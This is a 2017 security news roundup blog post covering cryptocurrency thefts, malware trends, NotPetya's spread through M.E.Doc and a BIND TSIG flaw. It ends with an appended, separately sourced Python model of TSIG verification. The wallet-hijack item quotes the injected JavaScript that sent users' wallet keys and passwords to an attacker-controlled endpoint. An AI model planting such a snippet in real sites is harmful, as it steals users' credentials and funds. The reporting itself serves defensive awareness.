Cyber Advisors Business Blog

In the Know - Cyber Security Update - Week of July 2nd, 2017

Written by Eric Brown | Jul 10, 2017 1:23:27 PM

Last week brought two bitcoin-related attacks, largely the result of successful social engineering (voice phishing): one on the South Korean bitcoin exchange Bithumb, and the second a website hijack of classicetherwallet.com. AV-TEST's comprehensive security report shows Mac and Android malware on the rise. Servers of Intellect Services, authors of M.E.Doc, were raided by Ukrainian police. And finally, a BIND flaw is patched.


  1. Bitcoin Theft from Bithumb
    The South Korean Bithumb exchange was the victim of a two-stage attack. First, the personal home computer of a company employee was hacked, which compromised the accounts of 31,800 (3%) of Bithumb users as the attacker gained access to names, email addresses and phone numbers. The attacker(s) then used this information to voice phish, calling victims while claiming to be a representative of Bithumb and asking for the disposable password that had been sent out to users in a letter.
    Why the employee had customer personally identifiable information on his/her home machine was not reported.
    https://bravenewcoin.com/news/fourth-largest-bitcoin-exchange-bithumb-hacked-for-billions-of-won/
  2. Bitcoin Theft from classicetherwallet.com
    Classic Ether Wallet is a software wallet for the Ethereum Classic cryptocurrency. Users of Classic Ether Wallet download and install the software to store their Ethereum Classic coins in an encrypted fashion.
    Social engineering was used to gain control of classicetherwallet.com. The website, hosted at 1and1.com, was compromised by an attacker who managed to convince a 1and1 support engineer to hand over control of the domain.
    Once the criminal controlled the site, Ethereum Classic coins were stolen from victims by capturing their wallet passwords when they tried to log into the site. The equivalent of $300,000 USD was transferred to another cryptocurrency exchange.

    Below is the source code that the attackers placed on the classicetherwallet.com domain to steal passwords:
    Wallet.sendData = function (input, password) {
        var http = new XMLHttpRequest();
        var url = "https://api.classicetherwallet.com/api";
        var json = {
            'key': input,
            'password': password,
        }
        http.open("POST", url, true);
        http.send(JSON.stringify(json));
    };

    https://www.reddit.com/r/EthereumClassic/comments/6kcwmi/attention_classicetherwalletcom_has_been_hijacked/
  3. macOS & Android Malware on the Rise
    AV-TEST.org released its annual security report. Not surprisingly, the number of malware programs for macOS is on the rise, more than doubling within the first four months of this year.

    Mobile malware targets Android more than any other mobile operating system. In 2016 alone, 4 million new malware programs for Android were detected. So far in 2017, banking Trojans and ransomware appear to be on the rise on Android.

    The full report detailing attacks against all operating systems can be found here:
    https://www.av-test.org/fileadmin/pdf/security_report/AV-TEST_Security_Report_2016-2017.pdf
  4. M.E.Doc Software Owner, Intellect Services, Unwittingly Responsible for the Spread of NotPetya
    NotPetya is a destructive variant of the Petya ransomware that had a global impact. A Talos investigation found a supply-chain attack on the M.E.Doc software that delivered a destructive payload disguised as ransomware. Using stolen credentials, the actor was able to manipulate the M.E.Doc update server to proxy connections to an actor-controlled server. Software updates carrying malicious code were then pushed out, beginning the global chain of infection.

    M.E.Doc is a widely used accounting software package, similar in use to TurboTax in the US.
    http://www.bbc.com/news/technology-40497026
    http://blog.talosintelligence.com/2017/07/the-medoc-connection.html
  5. BIND DNS TSIG Request Bug
    A flaw was found in the way BIND (Berkeley Internet Name Domain) handled TSIG (Transaction SIGnature) authentication for dynamic updates. TSIG is a computer networking protocol defined in RFC 2845. It is used primarily by the Domain Name System (DNS) to authenticate updates to a DNS database, most commonly Dynamic DNS updates and updates to a secondary/slave DNS server.

    A remote attacker able to communicate with an authoritative BIND server could use this flaw to manipulate the contents of a zone by forging a valid TSIG or SIG signature for a dynamic update request, allowing the attacker to submit forged DNS updates. The attacker could also trigger a DNS zone transfer, leaking information about your DNS zone.

    A patch is available for BIND that fixes this vulnerability.
    http://www.synacktiv.ninja/ressources/CVE-2017-3143_BIND9_TSIG_dynamic_updates_vulnerability_Synacktiv.pdf
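To show what a forged update has to defeat, here is a simplified model of the TSIG check (RFC 2845) a server runs on a dynamic update request. This is an added example, not code from the post, from Synacktiv or from BIND; the key, key name and message bytes are constructed, the algorithm choice is assumed, and the update message is treated as an opaque byte string rather than a full DNS wire message.

```python
import hmac, hashlib, struct

# Added example, not from the post or from BIND: a minimal model of the RFC 2845
# TSIG check a server runs on a dynamic update. The message is an opaque byte
# string here (a real server hashes the DNS wire message minus the TSIG record);
# key, key name and message are constructed sample values.
ALG_NAME = "hmac-sha256."   # assumed algorithm, encoded as a DNS name
KEYS = {"update-key.example.": b"constructed-demo-secret"}   # constructed key table

def wire_name(name: str) -> bytes:
    """Encode a DNS name as uncompressed length-prefixed labels."""
    labels = [l for l in name.rstrip(".").split(".") if l]
    return b"".join(struct.pack("!B", len(l)) + l.encode("ascii") for l in labels) + b"\x00"

def tsig_variables(key_name: str, time_signed: int, fudge: int, error: int = 0) -> bytes:
    """Fields covered by the MAC (RFC 2845 3.4.2): key name, CLASS=ANY, TTL=0,
    algorithm name, 48-bit time signed, fudge, error, other-len=0."""
    return (wire_name(key_name) + struct.pack("!HI", 255, 0) + wire_name(ALG_NAME)
            + struct.pack("!HIHHH", time_signed >> 32, time_signed & 0xFFFFFFFF, fudge, error, 0))

def sign_update(key: bytes, key_name: str, msg: bytes, time_signed: int, fudge: int = 300) -> bytes:
    """Client side: HMAC over the message followed by the TSIG variables."""
    return hmac.new(key, msg + tsig_variables(key_name, time_signed, fudge), hashlib.sha256).digest()

def verify_update(keys: dict, key_name: str, msg: bytes, time_signed: int,
                  fudge: int, mac: bytes, now: int) -> str:
    """Server side: 'NOERROR' if the update is authentic, else the TSIG error name."""
    key = keys.get(key_name)
    if key is None:
        return "BADKEY"                 # unknown key name
    # RFC 2845 allows no MAC truncation: a short or empty MAC must never verify.
    if len(mac) != hashlib.sha256().digest_size:
        return "BADSIG"
    if not hmac.compare_digest(sign_update(key, key_name, msg, time_signed, fudge), mac):
        return "BADSIG"                 # tampered message or wrong key
    if abs(now - time_signed) > fudge:
        return "BADTIME"                # stale or replayed request
    return "NOERROR"

def demo() -> dict:
    """Check a genuine, a tampered, an unsigned, a replayed and an unknown-key update."""
    name, t = "update-key.example.", 1499700000
    msg = b"<constructed dynamic update: add www.example. A 192.0.2.10>"
    mac = sign_update(KEYS[name], name, msg, t)
    return {"genuine": verify_update(KEYS, name, msg, t, 300, mac, t + 10),
            "tampered": verify_update(KEYS, name, msg + b"!", t, 300, mac, t + 10),
            "empty_mac": verify_update(KEYS, name, msg, t, 300, b"", t + 10),
            "replayed": verify_update(KEYS, name, msg, t, 300, mac, t + 3600),
            "unknown_key": verify_update(KEYS, "other.example.", msg, t, 300, mac, t + 10)}
```

Only the first case verifies; every other case is rejected with the matching TSIG error code, which is the behaviour the patched BIND restores.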